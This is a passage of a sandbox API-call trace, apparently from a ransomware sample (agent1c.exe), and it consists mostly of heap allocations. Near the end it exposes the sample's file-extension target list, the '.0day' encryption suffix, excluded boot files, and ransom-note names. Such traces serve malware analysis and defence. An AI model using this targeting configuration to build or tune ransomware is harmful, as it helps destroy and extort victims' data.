0x629c00 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629c18 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629c30 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629c48 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629c60 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629c78 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629c90 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629ca8 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629cc0 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629cd8 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629cf0 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629d08 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629d20 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629d38 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629d50 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629d68 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629d80 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629d98 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x6252f0 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629db0 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629dc8 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629de0 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x629fd0 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629df8 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629e10 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629e28 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629e40 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629e58 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629e70 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629e88 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629ea0 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629eb8 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629ed0 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629ee8 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629f00 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629f18 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629f30 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629f48 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629f60 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629f78 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629f90 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c470 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c488 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c4a0 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x629fe0 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x629ff0 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c4b8 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c4d0 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c4e8 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c500 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c518 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c530 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c548 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c560 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c578 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c590 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c5a8 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c5c0 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c5d8 [0031.113] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6291a0, Size=0x400) returned 0x6291a0 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c5f0 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c608 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c620 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c638 [0031.113] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c650 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c668 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c680 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c698 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c6b0 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c6c8 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a000 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c6e0 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c6f8 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c710 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c728 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c740 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c758 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x63c770 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c788 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c7a0 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c7b8 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c7d0 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c7e8 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c800 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c818 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c830 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a010 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c870 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c888 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c8a0 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c8b8 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c8d0 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c8e8 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c900 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c918 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c930 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x63c948 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c960 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x63c978 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c990 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c9a8 [0031.114] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c9c0 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c9d8 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c9f0 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63ca08 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ca20 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ca38 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ca50 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ca68 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ca80 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ca98 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cab0 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cac8 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cae0 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63caf8 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cb10 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cb28 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cb40 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cb58 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cb70 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cb88 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cba0 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x63cbb8 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x625f08 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cbd0 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cbe8 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cc00 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cc18 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cc30 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cc70 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cc88 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cca0 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ccb8 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ccd0 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cce8 [0031.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cd00 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cd18 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cd30 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cd48 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cd60 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cd78 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cd90 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cda8 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cdc0 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63cdd8 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63cdf0 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63ce08 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x63ce20 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63ce38 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a020 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ce50 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a030 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ce68 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ce80 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ce98 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63ceb0 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63cec8 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cee0 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63cef8 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cf10 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cf28 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63cf40 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cf58 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63cf70 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63cf88 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cfa0 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a040 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cfb8 [0031.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63cfd0 [0031.117] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6291a0, Size=0x800) returned 0x63d458 [0031.117] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0031.117] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63b450 | out: hHeap=0x5f0000) returned 1 [0031.117] lstrlenW (lpString="") returned 0 [0031.117] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63dd98 | out: hHeap=0x5f0000) returned 1 [0031.117] lstrlenW (lpString=".0day") returned 5 [0031.117] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604758, Size=0x8) returned 0x604758 [0031.117] lstrlenW (lpString=".0day") returned 5 [0031.117] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63dd98 | out: hHeap=0x5f0000) returned 1 [0031.117] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63ddc8, Size=0x20) returned 0x604378 [0031.117] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604378, Size=0x40) returned 0x626a88 [0031.117] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626a88, Size=0x80) returned 0x64b458 [0031.117] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a0b0, Size=0x8) returned 0x62a0c0 [0031.117] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a0c0, Size=0x10) returned 0x63ddc8 [0031.117] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63ddc8, Size=0x20) returned 0x604350 [0031.117] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0031.117] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b458 | out: hHeap=0x5f0000) returned 1 [0031.117] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63ddf8, Size=0x20) returned 0x625938 [0031.117] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625938, Size=0x40) returned 0x626a88 [0031.117] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0031.117] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0031.117] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x626a88 | out: hHeap=0x5f0000) returned 1 [0031.117] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63ddf8, Size=0x20) returned 0x625938 [0031.117] lstrlenW (lpString="Info.hta") returned 8 [0031.117] lstrlenW (lpString="Info.hta") returned 8 [0031.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625938 | out: hHeap=0x5f0000) returned 1 [0031.118] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x65d448, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\agent1c.exe")) returned 0x31 [0031.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x65d448 | out: hHeap=0x5f0000) returned 1 [0031.118] lstrlenW (lpString="agent1c.exe") returned 11 [0031.118] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604350, Size=0x40) returned 0x626a88 [0031.118] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63ddf8, Size=0x20) returned 0x604350 [0031.118] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63ddf8, Size=0x20) returned 0x625938 [0031.118] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625938, Size=0x40) returned 0x626ad0 [0031.118] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626ad0, Size=0x80) returned 0x64b458 [0031.118] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b458, Size=0x100) returned 0x63b450 [0031.118] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63b450 | out: hHeap=0x5f0000) returned 1 [0031.118] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x65d448, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0031.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x66d450 | out: hHeap=0x5f0000) returned 1 [0031.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x65d448 | out: hHeap=0x5f0000) returned 1 [0031.118] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a0c0, Size=0x8) returned 0x62a0b0 [0031.118] lstrlenW (lpString="%windir%;") returned 9 [0031.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x604350 | out: hHeap=0x5f0000) returned 1 [0031.118] lstrlenW (lpString="C:\\Windows;") returned 11 [0031.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64d440 | out: hHeap=0x5f0000) returned 1 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63de10, Size=0x20) returned 0x604350 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604350, Size=0x40) returned 0x626ad0 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626ad0, Size=0x80) returned 0x64b458 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b458, Size=0x100) returned 0x63b450 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a0f0, Size=0x8) returned 0x62a100 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a100, Size=0x10) returned 0x63de58 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63de58, Size=0x20) returned 0x604350 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a0c0, Size=0x8) returned 0x62a100 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a0d0, Size=0x8) returned 0x62a0c0 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a0f0, Size=0x8) returned 0x62a110 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a110, Size=0x10) returned 0x63df00 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63df00, Size=0x20) returned 0x625938 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a100, Size=0x10) returned 0x63df00 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a0c0, Size=0x10) returned 0x63df30 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a100, Size=0x8) returned 0x62a0f0 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a120, Size=0x8) returned 0x62a130 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63df00, Size=0x20) returned 0x6258e8 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63df30, Size=0x20) returned 0x625848 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a140, Size=0x8) returned 0x62a150 [0031.119] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0031.119] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63b450 | out: hHeap=0x5f0000) returned 1 [0031.119] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, 